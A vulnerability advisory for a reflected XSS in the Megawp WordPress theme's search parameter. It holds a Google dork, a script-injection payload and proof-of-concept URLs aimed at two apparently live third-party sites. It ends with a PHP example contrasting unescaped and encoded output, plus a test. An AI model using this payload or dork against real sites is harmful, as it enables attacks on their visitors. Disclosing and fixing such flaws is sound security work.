Megawp WordPress Theme - Unauthenticated Reflected XSS

2021.12.06
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

- # VULNERABILITY: Megawp WordPress Theme - Unauthenticated Reflected XSS
- # GOOGLE DORK: Megawp-Theme
- # DATE: 2021-02-10
- # SECURITY RESEARCHER: EbRaHiM-VaKeR [ https://ebrahim-ghiasi.ir ]
- # VENDOR: Megawp-Theme [ http://megawp.almastheme.com/megawp-demos/ ]
- # SOFTWARE VERSION: <= 1
- # SOFTWARE LINK: https://www.zhaket.com/web/megawp-wordpress-theme
- # CVE: N/A

### -- [ Info: ]

[i] An Unauthenticated Reflected XSS vulnerability was discovered in the Megawp-Theme for WordPress.
[i] Vulnerable parameter(s): ?s=

### -- [ Impact: ]

[~] Code injection and the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.

### -- [ Payload: ]

[$] ?s="><script>alert(`hacked`)</script>

### -- [ PoC | Unauthenticated Reflected XSS | Search query: ]

[!] https://lms.golvani.ir/?s=%22%3E%3Cscript%3Ealert(`hacked`)%3C/script%3E
[!] https://baameshimi.ir/?s=%22%3E%3Cscript%3Ealert(`hacked`)%3C/script%3E

### -- [ Contacts: ]

[+] Website: ebrahim-ghiasi.ir
[+] Telegram: @hajit00n
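
The fix for a reflected ?s= value is output encoding at the point where the term is written back into the page. The sketch below is an added example, not the Megawp theme's source or the researcher's code: it puts an unescaped search field next to an encoded one and counts the script elements an HTML parser sees in each. It assumes the term is echoed into an input's value attribute (the leading "> in the payload suggests an attribute context); the function names and the sample string are constructed for illustration.

```php
<?php
// Added illustration: NOT the Megawp theme's code. Assumption: the search
// term is reflected into value="" of the search input.

// Constructed sample input, shaped like the ?s= value in the advisory.
$sample = '"><script>alert(`hacked`)</script>';

// Vulnerable pattern: request data concatenated into an attribute as-is.
function search_field_vulnerable(string $s): string {
    return '<input type="search" name="s" value="' . $s . '">';
}

// Hardened pattern: encode for the HTML attribute context. ENT_QUOTES covers
// both quote styles; ENT_SUBSTITUTE replaces invalid UTF-8 sequences instead
// of making htmlspecialchars() return an empty string.
function search_field_hardened(string $s): string {
    $safe = htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="search" name="s" value="' . $safe . '">';
}

// Parse the fragment the way a browser would and count real <script> elements.
// A regression test for the theme can assert that this stays at zero.
function count_script_elements(string $html): int {
    libxml_use_internal_errors(true); // the fragment is deliberately malformed
    $doc = new DOMDocument();
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    return $doc->getElementsByTagName('script')->length;
}

$cases = [
    'vulnerable' => search_field_vulnerable($sample),
    'hardened'   => search_field_hardened($sample),
];
foreach ($cases as $name => $html) {
    printf("%-10s script elements: %d\n  %s\n", $name, count_script_elements($html), $html);
}
```

Inside a WordPress template the same encoding is available through esc_attr() for attribute values and esc_html() for text nodes, and get_search_query() returns the search term already passed through esc_attr() by default.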

